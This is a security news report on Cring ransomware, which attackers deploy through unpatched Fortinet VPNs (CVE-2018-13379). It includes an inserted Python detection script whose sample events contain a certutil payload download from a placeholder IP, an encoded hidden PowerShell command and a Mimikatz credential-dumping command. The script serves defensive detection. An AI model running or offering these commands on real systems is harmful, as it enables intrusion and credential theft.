Unpatched Fortinet VPN Devices Are Attacked by New Cring Ransomware
Hackers Exploit the CVE-2018-13379 Vulnerability in Fortinet VPN to Deploy Cring Ransomware to Companies in the Industrial Sector.
Cybercriminals are actively exploiting the CVE-2018-13379 vulnerability in Fortinet VPNs to deploy a new strain of ransomware, tracked as Cring, against companies in the industrial sector.
The Cring ransomware, also known as Crypt3r, Vjiszy1lo, Ghost and Phantom, first came to attention in January, when it was found by Amigo_A and spotted by the CSIRT team of Swiss telecommunications provider Swisscom.
CVE-2018-13379 is a path traversal flaw in the FortiOS SSL VPN web portal that allows an unauthenticated attacker to download FortiOS system files via specially crafted HTTP resource requests.
The Cring operators used a PowerShell script to decrypt their payload, the Cobalt Strike Beacon backdoor, which gave them remote control of the affected system. The Cring ransomware was then downloaded, and after encrypting the files it dropped a ransom note.
CRING, a new strain deployed by human-operated ransomware actors. After the actors have established initial access, they drop a customized Mimikatz sample followed by #CobaltStrike. The #CRING #ransomware is then downloaded via certutil. ^mike https://t.co/v5h8eqHCPt
— Swisscom CSIRT (@swisscom_csirt) January 26, 2021
Vyacheslav Kopeytsev, a senior security researcher at global security firm Kaspersky’s Industrial Control Systems Computer Emergency Response Team, revealed in a report that the threat actors use Internet-exposed FortiGate SSL VPN servers left unpatched against CVE-2018-13379 to breach their targets’ networks.
Victims of these attacks include industrial enterprises in European countries. In at least one case, the attack caused a temporary shutdown of the industrial process because the servers used to control it were encrypted.
Once they obtained access to a system inside the target network, the attackers downloaded the Mimikatz utility to steal the credentials of Windows users who had logged in to the compromised system.
As noted above, the ransomware payloads are then distributed to devices on the victims’ networks using the Cobalt Strike threat emulation framework, itself deployed by a malicious PowerShell script.
The ransomware encrypts victims’ data with AES-256 + RSA-8192 and then demands a ransom of roughly 2 BTC to get the files back.
Victims are then alerted by ransom notes named !!!!!readme.rtf and deReadMe!!!.txt that their network has been encrypted and that they need to pay the ransom as soon as possible, because the decryption key will not be kept indefinitely.
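The intrusion chain described above (certutil fetching the payload, a PowerShell script decoding the Cobalt Strike beacon, Mimikatz credential theft, and the two ransom-note filenames) can be turned into simple host-level detection logic. The following is an added example, not code from the article or from Kaspersky; the process-creation events it scans are constructed for illustration, and the rule names and the 198.51.100.7 address are placeholders.

```python
"""Detection rules for the Cring intrusion chain, run over constructed
process-creation events in a Sysmon-like JSON-lines shape."""
import json
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "srv01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/payload.dat C:\\Users\\Public\\p.dat"},
    {"host": "srv01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA=="},
    {"host": "srv02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile C:\\setup.msi SHA256"},   # benign certutil use
    {"host": "srv02", "image": r"C:\Users\Public\mimi.exe",
     "cmdline": "mimi.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "srv03", "image": r"C:\Windows\notepad.exe",
     "cmdline": "notepad C:\\Users\\Public\\Desktop\\!!!!!readme.rtf"},
]

# Ransom-note filenames named in the article, compared case-insensitively.
RANSOM_NOTES = {"!!!!!readme.rtf", "dereadme!!!.txt"}

# Each rule flags one stage of the chain; names are illustrative.
RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\b.*\s[-/]urlcache\b.*https?://", re.I)),
    ("powershell_encoded", re.compile(r"powershell(\.exe)?\b.*\s[-/](e|ec|enc|encodedcommand)\b", re.I)),
    ("mimikatz_modules", re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)),
]

def classify(event):
    """Return the rule names an event triggers (empty list when benign)."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # Flag any process whose last command-line path element is a Cring ransom note.
    tail = event["cmdline"].replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
    if tail in RANSOM_NOTES:
        hits.append("cring_ransom_note")
    return hits

def scan(events):
    """Group rule hits per host so a host matching several stages stands out."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(ev["host"], []).append(rule)
    return findings

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
```

A host that trips more than one stage (srv01 here) is the one to isolate first; the hashfile invocation shows why the certutil rule requires a URL rather than matching the binary name alone.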
According to Kopeytsev, here’s what you have to do to stay safe from this ransomware attack:
- Update the software of the SSL VPN Gateway to the latest versions;
- Update anti-malware solutions to the latest versions;
- Always keep anti-malware databases updated to the latest versions;
- Always check if all modules of anti-malware solutions are enabled;
- Change the Active Directory policy: allow users to log in only to those systems which are required by their operational needs;
- Restrict VPN access between facilities, close all ports that are not required by operational needs;
- Configure the back-up system to store back-up copies on a dedicated server;
- Store at least three back-up copies for each critical system;
- Store at least one back-up copy of each server on a dedicated, standalone storage medium, such as a hard drive;
- Verify the integrity of back-up copies periodically.
Since December 2020, when the operation initially came to light, victims have been using the ID-Ransomware service to check whether Cring infected their systems. 30 Cring ransomware samples have been submitted so far, with at least one per day since the end of January.
Kaspersky also shared indicators of compromise (IOCs) in its report.
Earlier this month, the U.S. Federal Bureau of Investigation (FBI) and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) issued a joint cybersecurity advisory warning that hacking groups are deliberately targeting vulnerabilities in Fortinet FortiOS.
The FBI and CISA observed Advanced Persistent Threat (APT) actors scanning devices on ports 4443, 8443 and 10443 for CVE-2018-13379 in FortiOS. They also observed the attackers scanning the enumerated devices for CVE-2020-12812 and CVE-2019-5591.
State-sponsored hackers exploited CVE-2018-13379 before damaging U.S. election support systems accessible over the Internet.
Fortinet followed up its release of a patch for CVE-2018-13379 with blog posts in August 2019 and July 2020 that provided more information and alerted customers to active attacks by APT29.
Fortinet said the security of its customers is its top priority and urged those who have not yet applied the upgrade and mitigations to do so as soon as possible.